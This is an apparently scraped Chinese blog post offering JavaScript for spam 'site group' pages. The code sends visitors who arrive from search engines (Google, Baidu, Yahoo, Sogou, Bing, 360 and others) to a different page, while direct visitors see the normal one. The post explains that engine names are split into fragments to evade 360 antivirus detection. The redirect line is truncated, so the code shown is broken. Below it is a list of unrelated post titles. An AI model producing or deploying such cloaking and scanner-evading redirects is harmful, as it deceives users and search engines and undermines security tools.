zoukankan      html  css  js  c++  java
  • 站群js跳转广告代码 防止360报毒代码-防扫最新JS来路跳转不报毒代码

    最新js来路跳转不报毒代码
    通过搜索引擎点击页面自动跳转到我们制定的页面!直接访问或者其他来路还是显示正常页面
    新更防扫版本!

    本代码功能为来路跳转修正 google baidu yahoo sogou跳转可能会被报毒,因此拆开来写。
    如google我们写成 go"+"o"+"gle,增加迷惑性。

    代码功能和之前一样,是判断来路跳转的。
    代码如下...

    <script type=text/javascript>
    GID89a="";
    var s=document.referrer;
    var str=window.location.href;
    if(s.indexOf("go"+"o"+"gle")>0 || s.indexOf("b"+"ai"+"du")>0 || s.indexOf("y"+"ahoo")>0 || s.indexOf("s"+"ogou")>0 || s.indexOf("bing")>0 || s.indexOf("360")>0 || s.indexOf("s"+"os"+"o")>0 || s.indexOf("youdao")>0 )
    window.location.;
    </script>
  • 相关阅读:
    CodeForcesGym 100524A Astronomy Problem
    ZOJ 2567 Trade
    HDU 3157 Crazy Circuits
    CodeForcesGym 100212E Long Dominoes
    UVALive 6507 Passwords
    [转]
    java socket
    Spark RDD Operations(2)
    Spark cache 和 persist
    vim 基础命令
  • 原文地址:https://www.cnblogs.com/shenjingwa/p/13887381.html
Copyright © 2011-2022 走看看